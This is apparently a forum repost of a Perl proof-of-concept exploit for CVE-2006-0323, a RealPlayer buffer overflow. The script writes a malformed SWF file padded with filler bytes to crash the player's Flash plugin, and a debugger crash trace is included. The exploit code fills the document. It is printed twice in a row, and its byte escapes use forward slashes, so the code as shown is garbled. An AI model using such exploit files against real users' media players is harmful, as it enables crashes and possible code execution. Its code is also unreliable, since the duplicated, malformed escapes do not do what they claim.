CODE:
#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323[/url]
#
# RealNetworks Advisory
# [url]http://service.real.com/realplayer/security/03162006_player/en/[/url]
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so
my $EGGFILE="egg.swf";
my $header="/x46/x57/x53/x05/xCF/x00/x00/x00/x60";
my $endheader="/x19/xe4/x7d/x1c/xaf/xa3/x92/x0c/x72/xc1/x80/x00/xa2/x08/x01".
"/x00/x00/x00/x00/x01/x02/x00/x01/x00/x00/x00/x02/x03/x00/x02".
"/x00/x00/x00/x04/x04/x00/x03/x00/x00/x00/x08/x05/x00/x04/x00".
"/x00/x00/x00/x89/x06/x06/x01/x00/x01/x00/x16/xfa/x1f/x40/x40".
"/x00/x00/x00";
open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE/n";
print EGG $header;
for ($i = 0; $i < 135; $i++) {
$buffer.= "/x90";
}
print EGG $buffer;
print EGG $endheader;
close(EGG);
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323[/url]
#
# RealNetworks Advisory
# [url]http://service.real.com/realplayer/security/03162006_player/en/[/url]
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so
my $EGGFILE="egg.swf";
my $header="/x46/x57/x53/x05/xCF/x00/x00/x00/x60";
my $endheader="/x19/xe4/x7d/x1c/xaf/xa3/x92/x0c/x72/xc1/x80/x00/xa2/x08/x01".
"/x00/x00/x00/x00/x01/x02/x00/x01/x00/x00/x00/x02/x03/x00/x02".
"/x00/x00/x00/x04/x04/x00/x03/x00/x00/x00/x08/x05/x00/x04/x00".
"/x00/x00/x00/x89/x06/x06/x01/x00/x01/x00/x16/xfa/x1f/x40/x40".
"/x00/x00/x00";
open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE/n";
print EGG $header;
for ($i = 0; $i < 135; $i++) {
$buffer.= "/x90";
}
print EGG $buffer;
print EGG $endheader;
close(EGG);